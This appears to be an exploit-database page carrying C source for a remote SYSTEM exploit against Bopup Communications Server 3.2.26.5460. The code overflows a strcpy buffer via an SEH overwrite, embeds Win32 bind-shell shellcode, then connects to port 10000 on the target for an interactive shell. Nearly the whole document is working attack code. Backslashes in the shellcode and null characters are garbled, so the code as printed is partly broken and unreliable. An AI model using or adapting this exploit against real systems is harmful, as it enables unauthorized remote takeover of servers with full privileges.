[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit
# Published : 2009-06-22
# Author : mu-b
# Previous Title : Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)
# Next Title : Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln
/* bopup-down.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Bopup Communications Server remote SYSTEM exploit
* by mu-b - Sat Feb 08 2008
*
* - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
*
* .text:00407A17 lea eax, [ebp+pkt_0x19]
* .text:00407A1D push eax
* .text:00407A1E lea eax, [ebp+var_354]
* .text:00407A24 push eax
* .text:00407A25 call _strcpy
*
* note: this is updated over time for newer versions, I can't be bothered
* making it universal nor anything else...
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define BOPUP_POPRET 0x00401DD5
#define NOP 0x41
#define PAD 0xCC
#define DEF_PORT 19810
#define PORT_BOPUP DEF_PORT
#define PORT_SHELL 10000
static char win32_x86_bind[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x27x10x66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0";
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
fprintf (stderr, "sock_send: send() - %sn", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
fprintf (stderr, "sock_recv: recv() - %sn", strerror (errno));
exit (EXIT_FAILURE);
}
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
fprintf (stderr, "shellami: select() - %sn", strerror (errno));
exit (EXIT_FAILURE);
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "shellami: connection closed by foreign host.n");
exit (EXIT_SUCCESS);
}
rbuf[n] = '�';
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '�';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
fprintf (stderr, "sockami: socket() - %sn", strerror (errno));
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
fprintf (stderr, "sockami: gethostbyname() - %sn", strerror (errno));
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
fprintf (stderr, "sockami: connect() - %sn", strerror (errno));
return (-1);
}
return (fd);
}
static void
zbuffami (char *zbuf)
{
char *ptr, *j_ptr;
ptr = zbuf;
memcpy (ptr, "x01x00x00x00", sizeof (int));
memset (ptr + sizeof (int), PAD, BOPUP_STR_OFFSET - sizeof (int));
memset (ptr + BOPUP_STR_OFFSET, NOP, BOPUP_STR_LEN);
ptr += BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8;
j_ptr = ptr - 32;
memcpy (j_ptr - (sizeof (win32_x86_bind)) + 1, win32_x86_bind,
sizeof (win32_x86_bind) - 1);
*j_ptr++ = 'xe9';
*j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x000000ff);
*j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x0000ff00) >> 8;
*j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0x00ff0000) >> 16;
*j_ptr++ = (-(sizeof (win32_x86_bind) - 1 + 5) & 0xff000000) >> 24;
*ptr++ = 'xeb';
*ptr++ = 'xde';
*ptr++ = 0x90;
*ptr++ = 0x90;
*(unsigned int *) ptr = BOPUP_POPRET;
}
int
main (int argc, char **argv)
{
char zbuf[BUF_SIZE];
int fd, n;
printf ("Bopup Communications Server remote SYSTEM exploitn"
"by: <mu-b@digit-labs.org>n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!nn");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>n", argv[0]);
exit (EXIT_SUCCESS);
}
fd = sockami (argv[1], PORT_BOPUP);
if (fd == -1)
{
fprintf (stderr, "%s: sockami failedn", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%dnn", argv[1], PORT_BOPUP);
printf ("** SEH offset @+%04Xn", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
printf ("** return addy @0x%08Xnn", BOPUP_POPRET);
printf ("* building buffer with shellcode...");
zbuffami (zbuf);
printf ("donen");
printf ("* sending request...");
if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
{
fprintf (stderr, "%s: sock_send returned %d (!= %d)n",
argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
exit (EXIT_FAILURE);
}
printf ("donen");
close (fd);
printf ("* waiting for the shellcode to be executed...n");
sleep (2);
if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
{
printf ("+Wh00t!nn");
shellami (fd);
}
return (EXIT_SUCCESS);
}
// www.Syue.com [2009-06-22]